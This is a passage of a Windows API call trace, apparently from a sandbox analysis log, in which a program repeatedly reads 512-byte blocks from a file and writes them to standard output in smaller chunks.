0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.376] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.377] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] GetFileType (hFile=0x4c) returned 0x1 [0111.377] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.377] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.378] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.378] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] GetFileType (hFile=0x4c) returned 0x1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.378] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.378] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.379] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.379] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] GetFileType (hFile=0x4c) returned 0x1 [0111.379] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.379] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.380] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.380] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] GetFileType (hFile=0x4c) returned 0x1 [0111.380] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.380] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] GetFileType (hFile=0x4c) returned 0x1 [0111.381] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.381] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.381] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.381] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.382] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.382] GetFileType (hFile=0x4c) returned 0x1 [0111.382] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.383] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.383] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] GetFileType (hFile=0x4c) returned 0x1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.384] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.384] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] GetFileType (hFile=0x4c) returned 0x1 [0111.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] GetFileType (hFile=0x4c) returned 0x1 [0111.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, 